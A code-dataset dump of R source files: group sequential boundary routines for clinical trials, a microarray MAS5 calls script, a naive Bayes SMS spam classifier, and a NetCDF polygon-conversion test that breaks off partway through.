last <- dnorm(grid,mean=0,sd=stdv[1]) # These are "first"
for (i in 2:length(t)){
if ({pd[i] < 0}|{pd[i] > 1}){
warning("Possible error in spending function. May be due to truncation.")
pd[i] <- min(1,pd[i])
pd[i] <- max(0,pd[i])
}
if (pd[i] < tol){
zb[i] <- -zninf
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)) pd[i+1] <- pe[i+1]-pe[i]
}
yb[i] <- zb[i]*sdproc[i]
}
else if (pd[i]==1) zb[i] <- yb[i] <- 0
else if ({pd[i] >= tol}&{pd[i] < 1}){
yb[i] <- bsearch(last,nints,i,pd[i]/side,stdv[i],ya,yb)
zb[i] <- yb[i]/sdproc[i]
if (zb[i] > ztrun){
zb[i] <- ztrun
pd[i] <- side*qp(zb[i]*sdproc[i],last,nints[i-1],ya[i-1],yb[i-1],stdv[i])
pe[i] <- pd[i]+pe[i-1]
if (i < length(t)){
pd[i+1] <- pe[i+1]-pe[i]
}
}
yb[i] <- zb[i]*sdproc[i]
}
if (side==1){
ya[i] <- zninf*sdproc[i]
za[i] <- zninf
}
else if (side==2){
ya[i] <- -yb[i]
za[i] <- -zb[i]
}
nints[i] <- ceiling((yb[i]-ya[i])/(h*stdv[i]))
if (i < length(t)){
hlast <- (yb[i-1]-ya[i-1])/nints[i-1] # These are "other"
x <- seq(ya[i],yb[i],length=nints[i]+1) # These are "other"
last <- fcab(last,nints[i-1],ya[i-1],hlast,x,stdv[i]) # These are "other"
}
}
}
ans <- list(lower.bounds=za,upper.bounds=zb,exit.pr=pe,diff.pr=pd,spend=alph$spend)
return(ans)
}
"plot.bounds" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F,...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&{x$bounds.type==1}){
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim,
ylim=ylim, las=las, pch=pch, type=type,...)
points(z,l,pch=pch, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"plot.drift" <-
function(x, scale = "z", main = NULL, xlab = NULL, ylab = NULL,
xlim, ylim, las=1, pch=19, type="o",add=F, ...){
if (!((inherits(x, "bounds"))|(inherits(x, "drift"))))
stop("'x' must inherit from class \"bounds\" or \"drift\"")
if (!scale%in%c("z","b"))
stop("Scale must be either \"z\" (z-value) or \"b\" (b-value)")
if (is.null(main))
main <- "Sequential boundaries using the Lan-DeMets method"
if (is.null(xlab))
xlab <- "Time"
if (is.null(ylab)){
if (scale=="z"){
ylab <- "Z"
}
else{
ylab <- "B"
}
}
z <- c(0,x$time)
r <- rep(0,length(z))
if(missing(xlim)) xlim <- c(0,z[length(z)])
if ({inherits(x, "bounds")}&&{x$bounds.type==1}){ ### TDC added extra "&"
u <- c(NA,x$upper.bounds)
if (scale=="b"){
u <- u*sqrt(z)
}
if(missing(ylim)) ylim <- c(0,max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim,
las=las, pch=pch, type=type,...)
points(z,r, ...)
lines(z,r,...)
}
else{
u <- c(NA,x$upper.bounds)
l <- c(NA,x$lower.bounds)
if (scale=="b"){
u <- u*sqrt(z)
l <- l*sqrt(z)
}
if(missing(ylim)) ylim <- c(min(l,na.rm=T),max(u,na.rm=T))
if(add) lines(z,u, pch=pch, type=type,...)
else plot(z,u, main = main, xlab = xlab, ylab = ylab, xlim=xlim, ylim=ylim, las=las, pch=pch,
type=type,...)
points(z,l,pch=19, ...)
lines(z,l,...)
points(z,r, ...)
lines(z,r,...)
}
}
"print.bounds" <-
function(object, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 3)
b[,1:3] <- c(z$time, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Lower", "Upper")
}
else{
b <- matrix(NA, p, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
if (ans$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", ans$n, "\nOverall alpha: ", ans$oalpha, "\n")
}
if (ans$type%in%c(1,4)){
if (ans$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nSpending function:", ans$spending, "\n", "\nBoundaries:\n")
}
if (ans$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", ans$alpha, "\nBoundary type (non-alpha-spending):", ans$spending, "\n", "\nBoundaries:\n")
}
if (ncol(ans$bounds)==3)
print.default(ans$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2, ...)
else
print.default(ans$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
else{
if (ans$type==2){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function: ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nSpending function: ", ans$spending, "\n")
}
}
if (ans$type==5){
if (length(ans$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nUpper alpha: ", ans$alpha[1], "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", ans$alpha/2, "\nUpper alpha: ", ans$alpha/2, "\nBoundary type (non-alpha-spending): ", ans$spending, "\n")
}
}
if (ans$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nSpending function for the lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nSpending function for the upper boundary: ", ans$spending[2], "\n")
}
if (ans$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", ans$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", ans$spending[1], "\nUpper alpha: ", ans$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", ans$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(ans$bounds, quote = FALSE, print.gap = 2, ...)
cat("\n")
}
}
"print.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "drift"))
stop("'x' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 3)
b[,1:3] <- c(z$time, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 4)
b[,1:4] <- c(z$time, z$time2, z$lower.probs, z$upper.probs)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
rownames(ans$bounds) <- rownames(ans$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", ans$n, "\n")
cat("\nBoundaries: \n")
if ((ans$type==1)|(ans$type==2)){
rownames(ans$bounds1) <- rownames(ans$bounds1, do.NULL = FALSE, prefix = "")
print.default(cbind(ans$bounds,ans$bounds1[,-1]), quote = FALSE, print.gap = 2, ...)
cat("\nPower : ", ans$power, "\n","\nDrift: ", ans$drift, "\n\n")
}
if (ans$type==3){
low <- ans$interval$lower.limit
up <- ans$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", ans$level, "\nLast Z value: ", ans$fzvalue, "\n", 100*ans$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (ans$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", ans$p.ordering, "\nLook: ", ans$analysis.time, "\nZ value observed at that time: ", ans$fzvalue, "\n", "P-value: ", ans$p.value, "\n")
}
}
"print.summary.bounds" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.bounds"))
stop("'x' must inherit from class \"summary.bounds\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
if (z$type%in%(1:3)){
cat("\nLan-DeMets bounds for a given spending function \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%(4:6)){
cat("\nGroup sequential boundaries \n", "\nn = ", z$n, "\nOverall alpha: ", z$oalpha, "\n")
}
if (z$type%in%c(1,4)){
if (z$type==1){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nSpending function:", z$spending, "\n", "\nBoundaries:\n")
}
if (z$type==4){
cat("\nType: One-Sided Bounds", "\nalpha: ", z$alpha, "\nBoundary type (non-alpha-spending):", z$spending, "\n", "\nBoundaries:\n")
}
if (ncol(z$bounds)==6)
print.default(z$bounds[,-2], digits = 5, quote = FALSE, print.gap = 2)
else
print.default(z$bounds[,-3], digits = 5, quote = FALSE, print.gap = 2)
}
else{
if (z$type==2){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nSpending function: ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nSpending function: ", z$spending, "\n")
}
}
if (z$type==5){
if (length(z$alpha)==2){
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nUpper alpha: ", z$alpha[1], "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
else{
cat("\nType: Two-Sided Symmetric Bounds", "\nLower alpha: ", z$alpha/2, "\nUpper alpha: ", z$alpha/2, "\nBoundary type (non-alpha-spending): ", z$spending, "\n")
}
}
if (z$type==3){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nSpending function for the lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nSpending function for the upper boundary: ", z$spending[2], "\n")
}
if (z$type==6){
cat("\nType: Two-Sided Asymmetric Bounds", "\nLower alpha: ", z$alpha[1], "\nType of (non-alpha-spending) lower boundary: ", z$spending[1], "\nUpper alpha: ", z$alpha[2], "\nType of (non-alpha-spending) upper boundary: ", z$spending[2], "\n")
}
cat("\nBoundaries:\n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
}
}
"print.summary.drift" <-
function(x, digit = 5, ...)
{
z <- x
if (!inherits(z, "summary.drift"))
stop("'x' must inherit from class \"summary.drift\"")
rownames(z$bounds) <- rownames(z$bounds, do.NULL = FALSE, prefix = "")
cat("\nLan-DeMets method for group sequential boundaries \n", "\nn = ", z$n, "\n")
cat("\nBoundaries: \n")
print.default(z$bounds, digits = digit, quote = FALSE, print.gap = 2)
if ((z$type==1)|(z$type==2)){
cat("\nPower : ", z$power, "\n","\nDrift: ", z$drift, "\n", "\n")
rownames(z$bounds1) <- rownames(z$bounds1, do.NULL = FALSE, prefix = "")
print.default(z$bounds1, digits = digit, quote = FALSE, print.gap = 2)
}
if (z$type==3){
low <- z$interval$lower.limit
up <- z$interval$upper.limit
cat("\nConfidence interval at the end of the trial: \n", "\nConfidence level: ", z$level, "\nLast Z value: ", z$fzvalue, "\n", 100*z$level, "% confidence interval: (", low, ",", up, ")\n")
}
if (z$type==4){
cat("\nAdjusted p-value: \n", "\nOrdering method: ", z$p.ordering, "\nLook: ", z$analysis.time, "\nZ value observed at that time: ", z$fzvalue, "\n", "P-value: ", z$p.value, "\n")
}
}
"qp" <-
function(xq,last,nints,yam1,ybm1,stdv){
hlast <- (ybm1-yam1)/nints
grid <- seq(yam1,ybm1,length=nints+1)
fun <- last*pnorm(grid,mean=xq,sd=stdv)
qp <- 0.5*hlast*(2*sum(fun)-fun[1]-fun[length(fun)]) # This is "trap"
return(qp)
}
"search.glan.obrien" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),c/sqrt((1:k)/k),0)$pr-alpha)
}
"search.glan.pocock" <-
function(k,c,alpha){
return(glan((1:k)/k,rep(-8,k),rep(c,k),0)$pr-alpha)
}
"summary.bounds" <-
function (object, digits=5, ...)
{
z <- object
if (!inherits(z, "bounds"))
stop("'object' must inherit from class \"bounds\"")
p <- length(z$time)
if (identical(z$time,z$time2)){
b <- matrix(NA, p, 6)
b[,1:6] <- c(z$time, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
else{
b <- matrix(NA, p, 7)
b[,1:7] <- c(z$time, z$time2, z$lower.bounds, z$upper.bounds, z$exit.pr, z$diff.pr, z$nom.alpha)
colnames(b) <- c("Time", "Time 2", "Lower", "Upper", "Exit pr.", "Diff. pr.", "Nominal Alpha")
}
ans <- list()
ans$type <- z$bounds.type
ans$spending <- z$spending.type
ans$n <- p
ans$alpha <- z$alpha
ans$oalpha <- z$overall.alpha
ans$bounds <- b
class(ans) <- "summary.bounds"
return(ans)
}
"summary.drift" <-
function (object, ...)
{
z <- object
if (!inherits(z, "drift"))
stop("'object' must inherit from class \"drift\"")
ans <- list()
ans$type <- z$type
ans$n <- length(z$time)
if ((ans$type==1)|(ans$type==2)){
ans$power <- z$power
ans$drift <- z$drift
if (identical(z$time,z$time2)){
b <- matrix(NA, ans$n, 5)
b[,1:5] <- c(z$time, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
else{
b <- matrix(NA, ans$n, 6)
b[,1:6] <- c(z$time, z$time2, z$lower.probs, z$upper.probs, z$exit.probs, z$cum.exit)
colnames(b) <- c("Time", "Time 2", "Lower probs", "Upper probs", "Exit pr.", "Cum exit pr.")
ans$bounds1 <- b
}
}
if (ans$type==3){
ans$level <- z$conf.level
ans$fzvalue <- z$final.zvalue
ans$interval <- z$conf.interval
}
if (ans$type==4){
if (z$p.ordering=="SW"){
ans$p.ordering <- "Stage-wise"
}
if (z$p.ordering=="LR"){
ans$p.ordering <- "Likelihood ratio "
}
ans$fzvalue <- z$final.zvalue
ans$analysis.time <- z$analysis.time
ans$p.value <- z$p.value
}
if (identical(z$time,z$time2)){
ans$bounds <- matrix(c(z$time, z$lower.bounds, z$upper.bounds), ncol=3, dimnames = list(NULL,c("Time", "Lower", "Upper")))
}
else{
ans$bounds <- matrix(c(z$time, z$time2, z$lower.bounds, z$upper.bounds), ncol=4, dimnames = list(NULL,c("Time", "Time 2", "Lower", "Upper")))
}
class(ans) <- "summary.drift"
return(ans)
}
## Local Variables:
## End:
|
library("affy")
library("annotate")
library("hgu133a2.db")
data = ReadAffy()
calls = mas5calls(data)
probeids = rownames(exprs(calls))
toGeneIDs = getEG(probeids, "hgu133a2.db")
toSymbols = getSYMBOL(probeids, "hgu133a2.db")
PMATable = data.frame(toGeneIDs, toSymbols, exprs(calls))
write.table(PMATable, file = "PMATable.txt")
# ls()
# attributes(calls)
# mode(calls)
| /csplugins/trunk/ucsd/rsaito/rs_Progs/rs_R/BioConductor/AffyCalls/mas5calls_test2.R | no_license | ahdahddl/cytoscape | R | false | false | 372 | r |
library("affy")
library("annotate")
library("hgu133a2.db")
data = ReadAffy()
calls = mas5calls(data)
probeids = rownames(exprs(calls))
toGeneIDs = getEG(probeids, "hgu133a2.db")
toSymbols = getSYMBOL(probeids, "hgu133a2.db")
PMATable = data.frame(toGeneIDs, toSymbols, exprs(calls))
write.table(PMATable, file = "PMATable.txt")
# ls()
# attributes(calls)
# mode(calls)
|
# SMS spam filter: bag-of-words document-term matrix + naive Bayes.
# Expects sms_spam.csv in the working directory with columns
# type ("ham"/"spam") and text; trains on the first 4169 messages and
# evaluates on the remaining 1390.
#load the packages
library(tm)
library(wordcloud)
library(gmodels)
library(SnowballC)
# e1071 provides naiveBayes(); it was never loaded, so the model-fitting
# step below failed with "could not find function \"naiveBayes\""
library(e1071)
#read the data from the dataset
spam <- read.csv('sms_spam.csv')
spam$type <- factor(spam$type)
table(spam$type)
spam_messages <- subset(spam, type == "spam")
ham_messages <- subset(spam, type == "ham")
# quick visual check of the dominant spam vocabulary
wordcloud(spam_messages$text, max.words = 100, scale = c(3, 0.5))
#create the Document Term Matrix by performing various operations
#like convert the words into lowercase,stemming,remove numbers,
#remove punctuation,remove stop words
corpus <- VCorpus(VectorSource(spam$text))
dtm <- DocumentTermMatrix(corpus, control = list(
  tolower = TRUE,
  removeNumbers = TRUE,
  removePunctuation = TRUE,
  stopwords = TRUE,
  stemming = TRUE
))
#create the train labels and test labels
trainLabels <- spam[1:4169, ]$type
testLabels <- spam[4170:5559, ]$type
prop.table(table(trainLabels))
#create the train data and test data (same row split as the labels)
dtmTrain <- dtm[1:4169, ]
dtmTest <- dtm[4170:5559, ]
#low frequency words are removed i.e, frequency<5
freqWords <- findFreqTerms(dtmTrain, 5)
#restrict both matrices to the frequent training vocabulary
freqTrain <- dtmTrain[, freqWords]
freqTest <- dtmTest[, freqWords]
#The DTM matrix uses 1's or 0's depending on whether
#the word occurs in the sentence or not. Naive Bayes
#classifier works with categorical features. 1 and 0
#is therefore converted to Yes or No.
convert_counts <- function(x) {
  ifelse(x > 0, "Yes", "No")
}
#call convert_counts column-wise
train <- apply(freqTrain, MARGIN = 2,
               convert_counts)
test <- apply(freqTest, MARGIN = 2,
              convert_counts)
#create the model
classifier <- naiveBayes(train, trainLabels)
#predict using test data
testPredict <- predict(classifier, test)
#Confusion matrix, to check the performance of the model
CrossTable(testPredict, testLabels, dnn = c('predicted', 'actual'))
## Cell Contents
## |-------------------------|
## | N |
## | N / Row Total |
## | N / Col Total |
## |-------------------------|
##
##
## Total Observations in Table: 1390
##
##
## | actual
## predicted | ham | spam | Row Total |
## -------------|-----------|-----------|-----------|
## ham | 1200 | 23 | 1223 |
## | 0.981 | 0.019 | 0.880 |
## | 0.993 | 0.127 | |
## -------------|-----------|-----------|-----------|
## spam | 9 | 158 | 167 |
## | 0.054 | 0.946 | 0.120 |
## | 0.007 | 0.873 | |
## -------------|-----------|-----------|-----------|
## Column Total | 1209 | 181 | 1390 |
## | 0.870 | 0.130 | |
## -------------|-----------|-----------|-----------|
| /spam_filtering.R | no_license | AAsohail/spam_detection | R | false | false | 2,897 | r | #load the packages
# SMS spam filter: bag-of-words document-term matrix + naive Bayes.
# Expects sms_spam.csv in the working directory with columns
# type ("ham"/"spam") and text; trains on the first 4169 messages and
# evaluates on the remaining 1390.
library(tm)
library(wordcloud)
library(gmodels)
library(SnowballC)
# e1071 provides naiveBayes(); it was never loaded, so the model-fitting
# step below failed with "could not find function \"naiveBayes\""
library(e1071)
#read the data from the dataset
spam <- read.csv('sms_spam.csv')
spam$type <- factor(spam$type)
table(spam$type)
spam_messages <- subset(spam, type == "spam")
ham_messages <- subset(spam, type == "ham")
# quick visual check of the dominant spam vocabulary
wordcloud(spam_messages$text, max.words = 100, scale = c(3, 0.5))
#create the Document Term Matrix by performing various operations
#like convert the words into lowercase,stemming,remove numbers,
#remove punctuation,remove stop words
corpus <- VCorpus(VectorSource(spam$text))
dtm <- DocumentTermMatrix(corpus, control = list(
  tolower = TRUE,
  removeNumbers = TRUE,
  removePunctuation = TRUE,
  stopwords = TRUE,
  stemming = TRUE
))
#create the train labels and test labels
trainLabels <- spam[1:4169, ]$type
testLabels <- spam[4170:5559, ]$type
prop.table(table(trainLabels))
#create the train data and test data (same row split as the labels)
dtmTrain <- dtm[1:4169, ]
dtmTest <- dtm[4170:5559, ]
#low frequency words are removed i.e, frequency<5
freqWords <- findFreqTerms(dtmTrain, 5)
#restrict both matrices to the frequent training vocabulary
freqTrain <- dtmTrain[, freqWords]
freqTest <- dtmTest[, freqWords]
#The DTM matrix uses 1's or 0's depending on whether
#the word occurs in the sentence or not. Naive Bayes
#classifier works with categorical features. 1 and 0
#is therefore converted to Yes or No.
convert_counts <- function(x) {
  ifelse(x > 0, "Yes", "No")
}
#call convert_counts column-wise
train <- apply(freqTrain, MARGIN = 2,
               convert_counts)
test <- apply(freqTest, MARGIN = 2,
              convert_counts)
#create the model
classifier <- naiveBayes(train, trainLabels)
#predict using test data
testPredict <- predict(classifier, test)
#Confusion matrix, to check the performance of the model
CrossTable(testPredict, testLabels, dnn = c('predicted', 'actual'))
## Cell Contents
## |-------------------------|
## | N |
## | N / Row Total |
## | N / Col Total |
## |-------------------------|
##
##
## Total Observations in Table: 1390
##
##
## | actual
## predicted | ham | spam | Row Total |
## -------------|-----------|-----------|-----------|
## ham | 1200 | 23 | 1223 |
## | 0.981 | 0.019 | 0.880 |
## | 0.993 | 0.127 | |
## -------------|-----------|-----------|-----------|
## spam | 9 | 158 | 167 |
## | 0.054 | 0.946 | 0.120 |
## | 0.007 | 0.873 | |
## -------------|-----------|-----------|-----------|
## Column Total | 1209 | 181 | 1390 |
## | 0.870 | 0.130 | |
## -------------|-----------|-----------|-----------|
library("ncdf4")
context("NCDF SG polygonData tests")
# data prep.
# library(rgdal)
# shapeData<-readOGR(dsn = "data/Yahara_alb/Yahara_River_HRUs_alb_eq.shp",
# layer = "Yahara_River_HRUs_alb_eq",
# stringsAsFactors = FALSE)
# saveRDS(shapeData,file="data/yahara_shapefile_data.rds")
test_that("A whole shapefile can be written", {
polygonData <- readRDS("data/yahara_shapefile_data.rds")
nc_file <- ToNCDFSG(nc_file=tempfile(), geomData = polygonData)
nc<-nc_open(nc_file)
crs <- list(grid_mapping_name = "albers_conical_equal_area",
longitude_of_central_meridian = -96,
latitude_of_projection_origin = 23,
false_easting = 0.0,
false_northing = 0.0,
standard_parallel = c(29.5, 45.5),
semi_major_axis = 6378137.0,
inverse_flattening = 298.257223563,
longitude_of_prime_meridian = 0)
expect_equal(ncatt_get(nc, pkg.env$crs_var_name)[names(crs)], crs)
expect_equal(as.numeric(polygonData@data$GRIDCODE),as.numeric(ncvar_get(nc, varid = "GRIDCODE")))
expect_equal(length(nc$dim$instance$vals), length(polygonData@polygons))
for(var in names(polygonData@data)) {
expect_equal(ncatt_get(nc, var, pkg.env$geometry_container_att_name)$value,
pkg.env$geom_container_var_name)
expect_equal(ncatt_get(nc, var, pkg.env$crs)$value,
pkg.env$crs_var_name)
}
coords<-polygonData@polygons[[1]]@Polygons[[1]]@coords
expect_equal(as.numeric(coords[nrow(coords):1,1]),as.numeric(ncvar_get(nc, varid = "x", start = c(1), count = c(118))))
expect_equal(as.numeric(coords[nrow(coords):1,2]),as.numeric(ncvar_get(nc, varid = "y", start = c(1), count = c(118))))
# Check to make sure a hole is encoded correctly.
node_count <- ncvar_get(nc, pkg.env$node_count_var_name)
part_node_count <- ncvar_get(nc, pkg.env$part_node_count_var_name)
part_type <- ncvar_get(nc, pkg.env$part_type_var_name)
expect_equal(length(polygonData@polygons), length(node_count))
p <- 1
for(i in 1:length(node_count)) {
nCount <- 0
for(j in 1:length(polygonData@polygons[[i]]@Polygons)) {
if(polygonData@polygons[[i]]@Polygons[[j]]@hole) expect_equal(part_type[p], pkg.env$hole_val)
expect_equal(length(polygonData@polygons[[i]]@Polygons[[j]]@coords[,1]), part_node_count[p])
nCount <- nCount + part_node_count[p]
p <- p + 1
}
expect_equal(nCount, node_count[i])
}
checkAllPoly(polygonData, ncvar_get(nc,pkg.env$node_count_var_name),
ncvar_get(nc,pkg.env$part_node_count_var_name),
ncvar_get(nc,pkg.env$part_type_var_name))
returnPolyData<-FromNCDFSG(nc_file)
compareSP(polygonData, returnPolyData)
for(name in names(polygonData@data)) {
expect_equal(as.character(polygonData@data[name]), as.character(returnPolyData@data[name]))
}
for(i in 1:length(returnPolyData@polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons), length(polygonData@polygons[[i]]@Polygons))
for(j in 1:length(returnPolyData@polygons[[i]]@Polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons[[j]]@coords), length(polygonData@polygons[[i]]@Polygons[[j]]@coords))
}
}
# writePolyShape(returnPolyData, "yaharaData_test")
})
| /tests/testthat/test_polydata.R | permissive | nemochina2008/netcdf.dsg | R | false | false | 3,316 | r | library("ncdf4")
context("NCDF SG polygonData tests")
# data prep.
# library(rgdal)
# shapeData<-readOGR(dsn = "data/Yahara_alb/Yahara_River_HRUs_alb_eq.shp",
# layer = "Yahara_River_HRUs_alb_eq",
# stringsAsFactors = FALSE)
# saveRDS(shapeData,file="data/yahara_shapefile_data.rds")
test_that("A whole shapefile can be written", {
polygonData <- readRDS("data/yahara_shapefile_data.rds")
nc_file <- ToNCDFSG(nc_file=tempfile(), geomData = polygonData)
nc<-nc_open(nc_file)
crs <- list(grid_mapping_name = "albers_conical_equal_area",
longitude_of_central_meridian = -96,
latitude_of_projection_origin = 23,
false_easting = 0.0,
false_northing = 0.0,
standard_parallel = c(29.5, 45.5),
semi_major_axis = 6378137.0,
inverse_flattening = 298.257223563,
longitude_of_prime_meridian = 0)
expect_equal(ncatt_get(nc, pkg.env$crs_var_name)[names(crs)], crs)
expect_equal(as.numeric(polygonData@data$GRIDCODE),as.numeric(ncvar_get(nc, varid = "GRIDCODE")))
expect_equal(length(nc$dim$instance$vals), length(polygonData@polygons))
for(var in names(polygonData@data)) {
expect_equal(ncatt_get(nc, var, pkg.env$geometry_container_att_name)$value,
pkg.env$geom_container_var_name)
expect_equal(ncatt_get(nc, var, pkg.env$crs)$value,
pkg.env$crs_var_name)
}
coords<-polygonData@polygons[[1]]@Polygons[[1]]@coords
expect_equal(as.numeric(coords[nrow(coords):1,1]),as.numeric(ncvar_get(nc, varid = "x", start = c(1), count = c(118))))
expect_equal(as.numeric(coords[nrow(coords):1,2]),as.numeric(ncvar_get(nc, varid = "y", start = c(1), count = c(118))))
# Check to make sure a hole is encoded correctly.
node_count <- ncvar_get(nc, pkg.env$node_count_var_name)
part_node_count <- ncvar_get(nc, pkg.env$part_node_count_var_name)
part_type <- ncvar_get(nc, pkg.env$part_type_var_name)
expect_equal(length(polygonData@polygons), length(node_count))
p <- 1
for(i in 1:length(node_count)) {
nCount <- 0
for(j in 1:length(polygonData@polygons[[i]]@Polygons)) {
if(polygonData@polygons[[i]]@Polygons[[j]]@hole) expect_equal(part_type[p], pkg.env$hole_val)
expect_equal(length(polygonData@polygons[[i]]@Polygons[[j]]@coords[,1]), part_node_count[p])
nCount <- nCount + part_node_count[p]
p <- p + 1
}
expect_equal(nCount, node_count[i])
}
checkAllPoly(polygonData, ncvar_get(nc,pkg.env$node_count_var_name),
ncvar_get(nc,pkg.env$part_node_count_var_name),
ncvar_get(nc,pkg.env$part_type_var_name))
returnPolyData<-FromNCDFSG(nc_file)
compareSP(polygonData, returnPolyData)
for(name in names(polygonData@data)) {
expect_equal(as.character(polygonData@data[name]), as.character(returnPolyData@data[name]))
}
for(i in 1:length(returnPolyData@polygons)) {
expect_equal(length(returnPolyData@polygons[[i]]@Polygons), length(polygonData@polygons[[i]]@Polygons))
